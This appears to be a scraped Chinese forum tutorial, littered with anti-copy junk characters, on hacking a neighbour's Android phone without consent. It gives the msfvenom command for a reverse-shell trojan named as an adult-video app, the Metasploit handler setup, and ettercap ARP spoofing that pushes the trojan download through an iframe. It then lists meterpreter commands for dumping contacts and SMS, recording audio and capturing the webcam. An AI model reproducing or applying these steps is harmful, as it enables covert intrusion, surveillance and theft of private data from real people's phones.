* W# z( s' Q U4 [; k 五、msf+ettercap入侵邻居安卓手机 9 W5 t6 B5 r9 \
* \- t% [( X- k d) {! \) k
+ m# N v* \1 A9 N4 d \
首先启动msf
a6 G/ x8 \/ k$ n9 n! f
0 P8 l4 G: s$ O1 r" t* V0 G4 a
- q# U9 C" \; y6 a1 B L 先用kali生成一个安卓木马,如下命令: 8 A. [4 K+ J1 T
' r" I( O# d4 l' c+ ]
* r, S- l# D: L8 w5 q Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 2 }$ V2 K3 O0 ]4 l
( k% C8 l4 Y2 X# }# m. Q6 S. Z- v" l$ w) ^
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
' Z& y& u1 q9 I! [5 M* d) V( ^! N6 _ $ ?2 ]$ X' u1 s% l$ _
" i& T2 ?. W% t8 Z
然后进入msf
7 w$ u Y0 u" h+ j: u + f0 k; K/ P3 f; ~# H5 D! Q* E
U5 j. T: \/ f8 s' [$ I: f6 Y use exploit/multi/handler + g6 \' j% x6 n/ J5 u% i9 a
g0 C9 c6 G8 L- @3 A& A' H9 j$ `/ y
set payload android/meterpreter/reverse_tcp
: d7 ]" T2 ~+ E " Y: T) a5 J; F& ]$ O2 Z
# b* r) y0 u! m- l" P( _$ Q
set LHOST 192.168.0.109 //ip为kaili的ip
+ ]* l) m3 h( a7 R% [( |
0 H' o8 J& b8 l3 i+ w5 F- a) Z% a" f8 e! Z( [& ^ L( J3 E1 `0 _' M2 Z
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 / w& C" R* C+ p b, m9 L
. D+ z7 I& @0 s, [+ O( s7 [) w+ _
$ v' V- m" o$ f4 r0 N5 T
Exploit + Z* W5 j) \' j* f3 r: E) P' w
8 O: _4 w* S: R, e: O. r
3 F$ j& Q( z9 A) k4 Q - v* q+ A+ g$ z1 K# [3 B
* y# l% a! l2 _. k) y
7 s( \: X$ v% U/ ^ 下面我们开启ettercap -G
* O+ ^ {5 b+ n" N) U8 n4 @
$ t; u5 d7 M6 J# e* C6 d" b; ]3 u& \0 S* @# _7 I, }) K# H+ i5 S
我物理IP为 ) }( F2 k v. u+ j. ^; v
$ c: i) |0 W6 R% h" w- r4 G7 ~- \/ O. L3 W: O
% ]1 D: n3 ?0 d. Z, b1 L: m
' Z1 ^$ d6 o" Z+ {$ a
1 g9 D4 i* y# ?, D3 ]. t 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, , [. `+ z* f9 v+ Y" n
0 g E* ^" f4 N: C: h! J8 Z: B. I ~
- o: T7 H; r' `0 H* ?5 P3 F$ X
下面我们来设置一下 ; l- Y% K. P; [) y$ c
0 B- J0 V& A' M- ?! k
4 w6 o' {( X# m* R& m , T: @- _8 M) P+ ^" ~6 w. W# y$ l& M' V
3 f A) H+ K0 A
& Q; ?9 L. R0 J% N
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 0 B3 @0 X0 `0 [5 v( d! g/ z+ U. h
; J& G5 W$ ?" L8 {1 L' Z- l
! H1 I! n a# A* R
7 F7 W3 B1 n+ {( I - a: w4 H2 e4 R
% c$ Q% }' R0 |" P
' C P0 K: s; F9 E9 ]! v& \/ s
6 F" U2 i7 R7 h- U. {, X5 \
% _5 J, u; J5 c1 W3 g+ Y9 g
- ~! {$ n: h4 |7 |$ R9 t. q9 _ : h# A- |2 o, i0 ]. k' j
5 n, ?! X4 N/ }1 u! F7 ^
. w# S9 v% G$ J1 U7 s
' K8 P( P9 D4 ~6 c
0 F0 ~) r% U& [% F 4 X) r- l! J0 d" W$ L e
' o+ r2 V0 ?0 S; u. |" \9 Q* |' _% q( {# R2 u
5 w5 |- \* S- H, f& p 2 D- P4 L. ?7 \7 }
2 E/ c4 J. H" W
9 M9 K& [9 I* U( e
) H; m* d" X) c8 X
: ?* S2 u+ e) M8 E& P / {; c; h$ u( I
: x5 a" s; W- U. b% j2 o
6 w5 e5 @3 I k + N0 W' ~0 }+ ]% \1 c4 Q
6 ?- b; R+ _# F
$ W/ `" Q S3 E& t( d" ~ f7 K% W6 o* r: p4 h
# ^3 n, Y( a5 \% I
* N; y: l! Y8 U" k* C3 x+ Z
+ |; I+ e7 ~) j8 _. ^ 3 ^) E | B# ^, H) ?- B
3 g+ v( s- A. q$ I" W 0 Z }# q4 M. d6 E4 e# i' n& X. y
2 v' e& }1 e7 L( g$ ~
3 Q7 F I# V6 v- x
) X, ?: d8 C1 v% c* V5 w
9 G9 r5 v2 G+ o3 I1 ^+ j- ~, m7 `
6 ?6 f2 S# o/ a, q! O/ } 下面我们开始攻击
3 ]2 n- ~0 M; F5 }
% T% f% L( R$ v
/ N/ G4 j3 y, |( L5 n( J% L : Z4 g8 ] F1 }9 z- e
; o, U& p! J- F0 Y: o& r8 s) Q+ @9 i% b/ X: e* z. f
7 s3 Y7 z" k7 M6 f D) V# x
3 Q0 C( l5 ?1 L% N
1 \2 \+ @( M; M# U/ r- ^. a % ~0 j, _, M# Z9 F% L
2 S+ j, Q( [4 [* j U$ y9 B7 j( X! [7 }( F
, ?6 Q+ W0 B" h. K |$ Y2 R, W ! x7 e3 `: j- u3 j7 D1 @
K/ U% `1 y/ k- w4 P$ W
; \) h% I% W$ R* }' y8 M + K. ?$ J( F5 k8 O) M" U1 m
* }* w0 i- f4 R. d' z5 L# }
大概过了5分钟多,发现反弹成功了
' y/ K6 C" `, g& c) C
4 w( z. C$ V' J5 w0 t. ^3 F/ \3 }6 J8 N. z% i, @, c2 ~0 d; b
' m3 ]) V# ]( l1 K" v
9 P3 }- e( S( X; u8 |6 W/ @+ R' Z2 C! q8 E) C$ e7 W% X
4 @5 O8 u8 d& k- f( G4 w
5 `2 ]& S; x* P8 [4 F: I: O* R; c* T3 v5 w( k, z! b( m7 S
6 e$ H) w: ?* E- T
. ~/ ^, g- C8 ~# c6 I* c
" F1 I& g6 q+ L2 p" }
( b* J0 j0 I$ k8 Q2 ]7 p9 b
2 n* T# j. v0 S# T$ n# A5 u# m& f- A" I) y7 C! G. |
5 N" K" H5 ?, B# F0 [7 ?8 `
& B5 X/ i8 Q: @6 P/ p
6 h! o+ l- F; Z" W' }9 ?( h
$ ]% E% }% n) n+ } ) o5 }2 r, ^6 w) P J* X2 F
, t5 Q$ Y& r! \0 F0 J
' D) _ d2 h: s% X. y- R( z8 q+ `
" T: _6 m/ ? b, E- x! r
" }8 [5 g# s+ x a0 P9 N 执行命令
7 M- m. ^( ?4 o! f1 K' d# G) a ; O0 a/ T) j: ^* M/ R
+ Y* p4 m- @; D2 o8 w1 w. z4 G 9 E" e" y% z& ~
# K9 v1 @( _, k! d3 R5 e" D
' m( M: O% N: Q1 {5 m3 h \$ C) f; [ dump_contacts --》这个是导出电话 * U2 A/ ^! ~4 m+ C# [
' o6 X/ f( ?5 X4 P8 S, W9 H- B$ g
* p+ v" D/ b9 J dump_sms --》这个是导出信息
9 a x$ _7 _5 c u0 w! V4 e8 \4 S. r4 ]
7 B5 X1 z/ F( w. H( I record_mic Record audio from the default microphone for X seconds : {6 r+ W: }7 l" r* R2 j( ?1 |' a
' K4 \7 e: n. m- g( {: z
0 Q1 y2 ^ C# o# `; v
webcam_chat Start a video chat % ?5 B' K( k/ V8 F9 X4 R8 k
5 [" v' j2 R- W7 b" A
7 ?, l; x( L% R: A0 ] webcam_list List webcams
$ X! Z- `" G9 ~7 E ) h5 }5 D9 K- s* L" s% \) {
& e" h, I8 n6 p8 m( \8 p$ B7 D webcam_snap Take a snapshot from the specified webcam
d+ O3 P$ W, ^) Q% v* P
& w `4 a) i) i1 n9 |( \& t3 m
$ `+ X Z o! Q webcam_stream  lay a video stream from the specified webcam 1 z2 q2 M' t7 V6 M+ W
( g: C# F4 a. M6 `; Q0 J% d7 F- k+ Q2 ?; ~% U2 ]. n/ F. l& H
1 a: J% N8 @- X- W1 A0 I
& n8 m* @- f' D: R: L' [8 W) i! r, Z* {2 Y5 \
& o* O: Q3 D. f 7 a3 Y1 M' B* J- x
. j, o: z6 V, t1 V0 y8 w, Z
我们打开看一下电话薄, + G( }2 O7 U. A. T) |
+ z$ q! {8 R0 q% h G
( R0 C/ x. T# g' d- u) d 8 d$ U' i, c% V! i G" _3 Z0 Q$ m
7 e8 @6 @ _1 e! F; p/ g
. w6 j9 t: ~1 q1 A- | 3 a6 N3 k! V+ f K( r
5 A8 ~4 u+ A7 s! f7 R# I3 r q: A; i* \+ [2 A/ g
: J/ R" ~: z N! T6 p1 ? + v6 |, q2 B# V7 m, E; Z, O1 R5 T
# |: Z' {3 t1 ~! G/ }2 H8 v8 `
' S: N% T; e! }0 D9 m' l3 O
5 `+ W* N; P" I- e' M6 R* I* n6 ~/ _2 ^- {5 B. \) A* C9 l: V; w$ U& |
# |7 D$ t: f5 e" N. m
8 \* I5 v1 q% k; P) i1 e+ l
5 `0 o- t, u4 U % o& ?# d6 b0 x" j2 p! Y7 Z
" R3 C+ }7 n5 R' Z3 F: [. b# `: r& U' e
& h, l# Y2 n2 D4 c( \* A
我们同时欺骗成DroidJack木马,使用方法如图:
' D. N4 @7 f& c# C6 y3 Z5 u
! C; W' s1 S9 l6 B7 q) X4 A5 ]: \. F' w" g; D5 j( E
6 w( `0 `- p8 D5 l* l. v$ B
4 d5 [% X# a! c. J9 G1 }
2 t. d" ~' `, l4 Y4 \" H: ]3 Y9 E a1 R# F, D- E1 \0 Z- g! r& |
5 g4 N6 V7 u8 l |$ S
' f5 `9 _3 D/ S" i7 y: R0 u' G
: b9 h; z6 @. v+ a
2 o% f% ` D% P# g
) Z1 |9 o0 F0 O; @0 H4 f 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
% e6 p7 C' g/ u# a0 J$ l
8 C# }2 M6 m! @8 t* L2 k) @+ H6 v$ v% J5 ]
k7 c; R: U2 v+ u( m( z; ^! R
& D1 T' b, k9 ^- n" m3 U2 G J
M- g" y* a: E+ [7 B: w ; J, w& n7 ?; j7 l* j
3 a; P2 W2 X" }$ T. c* y' y( U
3 `( H' q1 M# k: r* }# i
2 N+ S! w+ p, s ' `' F# T+ l9 n" [
, A) d% ^+ M# x: X
: v) C# D% Z/ M) G7 t& o5 G0 E 7 |; Y" s. n" l5 K( o6 S
4 E1 |$ o4 F t
' Q+ v* p, \9 o% X% A! q6 I
|